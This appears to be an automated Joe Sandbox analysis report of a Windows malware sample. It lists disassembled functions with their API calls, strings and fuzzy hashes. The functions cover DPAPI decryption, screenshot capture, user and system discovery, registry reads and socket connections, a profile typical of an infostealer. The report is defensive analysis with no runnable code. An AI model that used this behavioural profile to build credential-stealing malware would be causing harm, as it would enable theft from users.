Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
String ID: 1.3.1.zlib-ng
API String ID: 1109970293-992988628
Opcode ID: a76c52ca1100295dce4388bd63296ac4753b9ff7154bfa9c896794fd626aff6e
Instruction ID: 156abdff5cf05e26c7166892abd215daff9f46cb807fd22c98201ac15c85671b
Opcode Fuzzy Hash: a76c52ca1100295dce4388bd63296ac4753b9ff7154bfa9c896794fd626aff6e
Instruction Fuzzy Hash: B781B4A2F15B8185E710DF70E8502ED33A5EB94748F108632EE5D97B99EE78E5A1C340

Function 00007FF6A70415F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 00007FF6A7041645
NtProtectVirtualMemory.NTDLL ref: 00007FF6A7041698

Strings

0, xrefs: 00007FF6A7041623

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: MemoryVirtual$ProtectQuery
String ID: 0
API String ID: 1355999870-4108050209
Opcode ID: 1e8753ed2aab2ba12e738e60e9ac9591d6e3866d73b3672bb0ead951c35cddb0
Instruction ID: e89389a4085642c86f77fbfaf606ec1357945a0a9f7c1cc35612cf9b5e84ad1e
Opcode Fuzzy Hash: 1e8753ed2aab2ba12e738e60e9ac9591d6e3866d73b3672bb0ead951c35cddb0
Instruction Fuzzy Hash: 81114262A1AF8182E6508F15F55036673A4FBA87B4F501335FAAD827E8DF3CE194CB04

Function 0000018C89A81EA0 Relevance: 3.1, APIs: 2, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 0000018C89A81EF8
LocalFree.KERNEL32 ref: 0000018C89A81F8A

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 534917215b691bdf8008ca3940d01222a19eb5e5d5bf9c8332b99172fc4e0cb2
Instruction ID: b89b872d14a52a42aa76bc73109f357018a211a432ed0d8a3c2ae638fd203177
Opcode Fuzzy Hash: 534917215b691bdf8008ca3940d01222a19eb5e5d5bf9c8332b99172fc4e0cb2
Instruction Fuzzy Hash: BC414932754B90CAE3208F74E4403ED37A4F75A74CF448629AA8816E8ADF79D669C394

Function 0000018C89A913B0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNEL32 ref: 0000018C89A91421

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: DriveLogicalStrings
String ID:
API String ID: 2022863570-0
Opcode ID: 05563d9c9f8d9765ab942f76f343afa8ceddb3167ad04ffcdfa04968ca2d4d44
Instruction ID: 0969b17f5db01a5e6ea94b8f4f8976baa8bec11d219a635a351bf0fd21e1e531
Opcode Fuzzy Hash: 05563d9c9f8d9765ab942f76f343afa8ceddb3167ad04ffcdfa04968ca2d4d44
Instruction Fuzzy Hash: 7E41A033A18B8082E710CF20E8803DE7774F795788F149215EE8823A69DF78E6D5DB80

Function 0000018C89A90110 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0000018C89A90155

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 5706546f313706de72a237bf98d2ae5729b4666c4094d2ca0903643dc08702f3
Instruction ID: 21c10848635882abab0a90906ae26373de5c1929ed4bb3ea470ac2b8d3a51dd3
Opcode Fuzzy Hash: 5706546f313706de72a237bf98d2ae5729b4666c4094d2ca0903643dc08702f3
Instruction Fuzzy Hash: B601883215878086D720CF25F8513DEB3A4F79A788F548111EA8D42655DFBCC694CB50

Function 0000018C89A88B30 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 194
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000018C89A888B0: InitializeCriticalSectionEx.KERNEL32 ref: 0000018C89A88901
Part of subcall function 0000018C89A888B0: GetLastError.KERNEL32 ref: 0000018C89A8890B

EnterCriticalSection.KERNEL32 ref: 0000018C89A88B71
GdiplusStartup.GDIPLUS ref: 0000018C89A88B98
LeaveCriticalSection.KERNEL32 ref: 0000018C89A88BA6
LeaveCriticalSection.KERNEL32 ref: 0000018C89A88BD4
GdipGetImageEncodersSize.GDIPLUS ref: 0000018C89A88BE2
GdipGetImageEncoders.GDIPLUS ref: 0000018C89A88C76
GdipCreateBitmapFromScan0.GDIPLUS ref: 0000018C89A88D40
GdipSaveImageToStream.GDIPLUS ref: 0000018C89A88D5E
GdipDisposeImage.GDIPLUS ref: 0000018C89A88DC3
GdipDisposeImage.GDIPLUS ref: 0000018C89A88DD7

Strings

&, xrefs: 0000018C89A88D3A

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Gdip$Image$CriticalSection$DisposeEncodersLeave$BitmapCreateEnterErrorFromGdiplusInitializeLastSaveScan0SizeStartupStream
String ID: &
API String ID: 1703174404-3042966939
Opcode ID: e0228fc8eea7d5b1ef60bb9784c8d30ef67e4de2cf218bbc2f582390e882f76a
Instruction ID: 1cdb98ca970a766c904a62fd128095222f92b0467193b11ff692e7ffa8efc633
Opcode Fuzzy Hash: e0228fc8eea7d5b1ef60bb9784c8d30ef67e4de2cf218bbc2f582390e882f76a
Instruction Fuzzy Hash: B891A072240B549AEB20CF25E8047DC37A4F756B98F54C215EA1957B98DF38C69AC3E0

Function 0000018C89A89BE0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 250
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000018C89A8F890: GetUserGeoID.KERNEL32 ref: 0000018C89A8F8B7
Part of subcall function 0000018C89A8F890: GetGeoInfoA.KERNEL32 ref: 0000018C89A8F8D1
Part of subcall function 0000018C89A8F890: GetGeoInfoA.KERNEL32 ref: 0000018C89A8F921

WSAStartup.WS2_32 ref: 0000018C89A89D59
socket.WS2_32 ref: 0000018C89A89D7A
htons.WS2_32 ref: 0000018C89A89DA0
inet_pton.WS2_32 ref: 0000018C89A89DE3
connect.WS2_32 ref: 0000018C89A89DFD
closesocket.WS2_32 ref: 0000018C89A89E1C
WSACleanup.WS2_32 ref: 0000018C89A89E22

Strings

system, xrefs: 0000018C89A89CC5
geo, xrefs: 0000018C89A89D06

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Info$CleanupStartupUserclosesocketconnecthtonsinet_ptonsocket
String ID: geo$system
API String ID: 213021568-2364779556
Opcode ID: aae1ad010feb51fc138a4e8346bd0647f4f208f8004b4dad7554445ffa4f9af8
Instruction ID: 925cbbca236348b6fa684e7eace969f4b1b4ef569d8a8a66a444223f1642afc0
Opcode Fuzzy Hash: aae1ad010feb51fc138a4e8346bd0647f4f208f8004b4dad7554445ffa4f9af8
Instruction Fuzzy Hash: ADC1BF72B81B9089EB10DBA4D4403EC33B2E786798F41D212DE5D27AA9DE74C64AC390

Function 0000018C89A93B30 Relevance: 13.6, APIs: 9, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0000018C89A93B61
GetProcessId.KERNEL32 ref: 0000018C89A93B6A
RmStartSession.RSTRTMGR ref: 0000018C89A93B8A
RmRegisterResources.RSTRTMGR ref: 0000018C89A93BB5
RmGetList.RSTRTMGR ref: 0000018C89A93BEE
RmGetList.RSTRTMGR ref: 0000018C89A93C50
RmEndSession.RSTRTMGR ref: 0000018C89A93C8B
RmEndSession.RSTRTMGR ref: 0000018C89A93CC2
RmEndSession.RSTRTMGR ref: 0000018C89A93CD7

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Session$ListProcess$CurrentRegisterResourcesStart
String ID:
API String ID: 3299295986-0
Opcode ID: fd498ee3de36280c394abacf9467fc5b9ce5ac8d70b1b0db778499f5d870b0f3
Instruction ID: 7577aa1b782c27375dcacdd6857819c261fbd908a318693189401aacbf5add8c
Opcode Fuzzy Hash: fd498ee3de36280c394abacf9467fc5b9ce5ac8d70b1b0db778499f5d870b0f3
Instruction Fuzzy Hash: 70514C36740A408AFB10CFB5E4546DD73B1B749748F50C12AEE1A67B98DF38DA0AC7A0

Function 0000018C89AAD5F0 Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AADA1D

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 197761c4084f71b538abde1851977105dd70471639988d7dce5d49f8975dacdd
Instruction ID: 22e3dcc2f63c920746e2e830d4862f7a3c4c4f4042cd005157b93b4ce37febd4
Opcode Fuzzy Hash: 197761c4084f71b538abde1851977105dd70471639988d7dce5d49f8975dacdd
Instruction Fuzzy Hash: 0FC1D43224878597E7619B1594403EEBBE4F786B90F56C125EA8A03BD1DF79CA4CC3A0

Function 0000018C89A88990 Relevance: 9.0, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 0000018C89A889D3
EnterCriticalSection.KERNEL32 ref: 0000018C89A889E5
EnterCriticalSection.KERNEL32 ref: 0000018C89A889F5
GdiplusShutdown.GDIPLUS ref: 0000018C89A88A03
LeaveCriticalSection.KERNEL32 ref: 0000018C89A88A10
LeaveCriticalSection.KERNEL32 ref: 0000018C89A88A1A

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
String ID:
API String ID: 4268643673-0
Opcode ID: 83031f1c3d95a3b59bc2a22e43b72ccd41805d9851eefa9cc92077698de98015
Instruction ID: 0f2fdd49ade4517071edcd784c145f67741b8784e1188f579d140c1fc59ae032
Opcode Fuzzy Hash: 83031f1c3d95a3b59bc2a22e43b72ccd41805d9851eefa9cc92077698de98015
Instruction Fuzzy Hash: 17116A32141B50C1EB108F29E8541DC73B4FB45FA4B28C215DA6D166A4DF34CA9BC390

Function 00007FF6A7047CB0 Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7047F9D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7047FA3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A7047FAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7047FB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7047FBB

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: 68560b9ec9290b65af6a78de1ac2c7821c6a1d2327af68e69ac7e4eae41ab174
Instruction ID: 48744a99a088b42aa26340fa84eb83d7bcb41b73041302bc13e80239434a10c6
Opcode Fuzzy Hash: 68560b9ec9290b65af6a78de1ac2c7821c6a1d2327af68e69ac7e4eae41ab174
Instruction Fuzzy Hash: 8D81A5B3A1AB8186EB10CF25E45026E77A5FB98794F105735EA9C83B99DF7CE190C700

Function 00007FF6A7047A80 Relevance: 7.6, APIs: 5, Instructions: 147COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6A7047ACF
OpenProcessToken.ADVAPI32 ref: 00007FF6A7047AE2
GetTokenInformation.KERNELBASE ref: 00007FF6A7047B1E
RtlEnterCriticalSection.NTDLL ref: 00007FF6A7047B5F
RtlLeaveCriticalSection.NTDLL ref: 00007FF6A7047B6D

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: CriticalProcessSectionToken$CurrentEnterInformationLeaveOpen
String ID:
API String ID: 2440646923-0
Opcode ID: a6224817af5826b4e66e685dd3dccc438d8954053d36f8f870129e687be14717
Instruction ID: 5b6959a6351deada9eea92a8e4d2f7c22c625c8edd4982e0deda349dfc51e49d
Opcode Fuzzy Hash: a6224817af5826b4e66e685dd3dccc438d8954053d36f8f870129e687be14717
Instruction Fuzzy Hash: 9F51A1A1A0AA0292FB749F11B55037A67A1EFA4BD0F445034EF4ED7B95CF3DE8229740

Function 00007FF6A70419A0 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A70416C0: GetModuleHandleW.KERNEL32 ref: 00007FF6A70416FD
Part of subcall function 00007FF6A70416C0: RtlImageNtHeader.NTDLL ref: 00007FF6A704171D
Part of subcall function 00007FF6A70416C0: RtlGetNtVersionNumbers.NTDLL ref: 00007FF6A704177A
Part of subcall function 00007FF6A70416C0: RtlGetNtVersionNumbers.NTDLL ref: 00007FF6A7041914

RtlGetNtVersionNumbers.NTDLL ref: 00007FF6A7041A0B
RtlGetNtVersionNumbers.NTDLL ref: 00007FF6A7041A73
RtlImageDirectoryEntryToData.NTDLL ref: 00007FF6A7041B08

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: NumbersVersion$Image$DataDirectoryEntryHandleHeaderModule
String ID:
API String ID: 1637451276-0
Opcode ID: c7c4423c1df835fe1051eadc678f80f7c1d6eee4b7a917dd86c14d9ff8850ea5
Instruction ID: 2b323bd144a709e096da1ed8e9c72771cc50425b87a1f08e50c99019b0cefc2c
Opcode Fuzzy Hash: c7c4423c1df835fe1051eadc678f80f7c1d6eee4b7a917dd86c14d9ff8850ea5
Instruction Fuzzy Hash: CA616AB2B15A029AEB50CF64D4402AD77B1FB68748F440136CF0DE7A98EF38E9A5D750

Function 0000018C89A90420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegGetValueA.ADVAPI32 ref: 0000018C89A90489

Strings

ProductName, xrefs: 0000018C89A90474
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0000018C89A9047B

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Value
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 3702945584-1787575317
Opcode ID: 4b31b020cac4b58e91cc22bf7df28ffde147e0876d00deb1f16a5955c36cd2ac
Instruction ID: 834bec8193cb8fa00cf1026963f4e72ea26e29518cf9ab9b320a91a53d6a4e44
Opcode Fuzzy Hash: 4b31b020cac4b58e91cc22bf7df28ffde147e0876d00deb1f16a5955c36cd2ac
Instruction Fuzzy Hash: B4119632218B8086D720CF21F4403DAB3A4F7CA794F418215EA9C03B59CFBCC258CB80

Function 0000018C89A9B090 Relevance: 4.9, APIs: 3, Instructions: 440COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A9B26B
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A9B474
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A9B5F0

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 0af578612e83e01876ebb02f31d3da84e12a9afdbdc8cd8c416365c21273e13c
Instruction ID: cabdbb48e2b598e8a69022c4d6539ee427acf2081d2665f09da10b6d8320cfd4
Opcode Fuzzy Hash: 0af578612e83e01876ebb02f31d3da84e12a9afdbdc8cd8c416365c21273e13c
Instruction Fuzzy Hash: DBF1C132251B8481EA24CB25E8447EE73A4F78ABE4F14C625AFBD07B95DF38D294C350

Function 00007FF6A7042E10 Relevance: 4.8, APIs: 3, Instructions: 298libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A7044F00: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6A7043C4C,?,?,?,00007FF6A7041097), ref: 00007FF6A7044F50

LoadLibraryA.KERNEL32 ref: 00007FF6A70430F8
GetProcAddress.KERNEL32 ref: 00007FF6A704310E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A704318C

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: AddressLibraryLoadProcQueryVirtual_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3513549592-0
Opcode ID: e3ab0b1cb5af30e30cab7697ef1babff4d2411869d2c5dc3a56a725404a04dc9
Instruction ID: a838a979c4bb4302a94a37709deb3ea57d617cc016bdffcb952e7d98b2d7debc
Opcode Fuzzy Hash: e3ab0b1cb5af30e30cab7697ef1babff4d2411869d2c5dc3a56a725404a04dc9
Instruction Fuzzy Hash: DCC1DFA2F1AA5288FB108F61D4043BC67A5BB28B98F485131CE1DE77C5CF78E4A1E344

Function 0000018C89A8ED77 Relevance: 4.7, APIs: 3, Instructions: 182networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 0000018C89A8F0AC
closesocket.WS2_32 ref: 0000018C89A8F0BE
WSACleanup.WS2_32 ref: 0000018C89A8F0C4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Cleanupclosesocketrecv
String ID:
API String ID: 3447645871-0
Opcode ID: 253e051fa6a7509d264a04efc5fb6ef094cdb4ff9579c5219fa1a455744927c6
Instruction ID: d005fbbfaaa7a8b73048c8ccd07f2a045cf8d84a2ec8bc62923fe57d49d602c3
Opcode Fuzzy Hash: 253e051fa6a7509d264a04efc5fb6ef094cdb4ff9579c5219fa1a455744927c6
Instruction Fuzzy Hash: 5E918473A54BD081EA20DB28E4543EE6761F7CA7A0F10C301EAAD57ADADF78C585C790

Function 0000018C89A91111 Relevance: 4.7, APIs: 3, Instructions: 163registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0000018C89A91129
RegEnumKeyExA.ADVAPI32 ref: 0000018C89A9116E
RegCloseKey.ADVAPI32 ref: 0000018C89A91364

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: 46a2b425fe9aeba63369c68ca3981fb753a76c630a185bcaa84e67fe462df2c1
Instruction ID: ae4abcd42b5c17e0aa6bab35e7eb1ca78e61339858a6b11a1325c100851341f8
Opcode Fuzzy Hash: 46a2b425fe9aeba63369c68ca3981fb753a76c630a185bcaa84e67fe462df2c1
Instruction Fuzzy Hash: E4719C72B44B8085EB10CB68E4447DE7770F7867A8F20C215EAA813AD9DF78D6C9C750

Function 0000018C89A910A0 Relevance: 4.6, APIs: 3, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0000018C89A91129
RegEnumKeyExA.ADVAPI32 ref: 0000018C89A9116E

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: EnumOpen
String ID:
API String ID: 3231578192-0
Opcode ID: a8920e58832bf877e089fa0af907033f7a3b2d639e35d700202a240f283f6ca3
Instruction ID: 1e38daaa6ad33d69d1102cd956ca3487a4a7470525216aa414c859efe7d631d0
Opcode Fuzzy Hash: a8920e58832bf877e089fa0af907033f7a3b2d639e35d700202a240f283f6ca3
Instruction Fuzzy Hash: C231AF32710B8485EB20CBA5E854BDE7374F786798F208215EEA817B94DF78D69AC740

Function 0000018C89A90DDB Relevance: 4.6, APIs: 3, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0000018C89A90DF7
RegQueryValueExA.ADVAPI32 ref: 0000018C89A90E36
RegCloseKey.ADVAPI32 ref: 0000018C89A90ED4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 0e9a2bb39f3aee4e9858c282cea2b023be1d8108f9c73034c28012e758624651
Instruction ID: 768dc806c9cf9096ad51db325c635a66795d908289c9a4c673641043c92dd44d
Opcode Fuzzy Hash: 0e9a2bb39f3aee4e9858c282cea2b023be1d8108f9c73034c28012e758624651
Instruction Fuzzy Hash: F521C872654B9481EE50CB25F4903EEB360FBCA7D4F40D212EA9E42A99DF3CD688C750

Function 0000018C89A8F890 Relevance: 4.6, APIs: 3, Instructions: 50COMMON

Download Yara Rule

APIs

GetUserGeoID.KERNEL32 ref: 0000018C89A8F8B7
GetGeoInfoA.KERNEL32 ref: 0000018C89A8F8D1
GetGeoInfoA.KERNEL32 ref: 0000018C89A8F921

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Info$User
String ID:
API String ID: 2017065092-0
Opcode ID: d34c2ece54cb3812040e4eef0477fed434900964bc97860851aa3e607d5351a2
Instruction ID: d72ada4a1c338871ceb283d2d9e204887d7acac9b593593f90d424c14ebc56d6
Opcode Fuzzy Hash: d34c2ece54cb3812040e4eef0477fed434900964bc97860851aa3e607d5351a2
Instruction Fuzzy Hash: 45119A32658B8582EB109F61F41079EB3A1F785B88F04A228EF8503B59DF7CD6948B84

Function 0000018C89A89760 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0000018C89A8979B
OpenProcessToken.ADVAPI32 ref: 0000018C89A897AE
GetTokenInformation.ADVAPI32 ref: 0000018C89A897EA

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ProcessToken$CurrentInformationOpen
String ID:
API String ID: 2743777493-0
Opcode ID: 5cf106d3b2ffd2a7e9a61a7f883b18dc6c947c023f1ec599732081f4b0d6fdce
Instruction ID: 883d9bda91c1b42dc67a3f2fbd4c74c292704050ef438ce2bc87a511d06fee63
Opcode Fuzzy Hash: 5cf106d3b2ffd2a7e9a61a7f883b18dc6c947c023f1ec599732081f4b0d6fdce
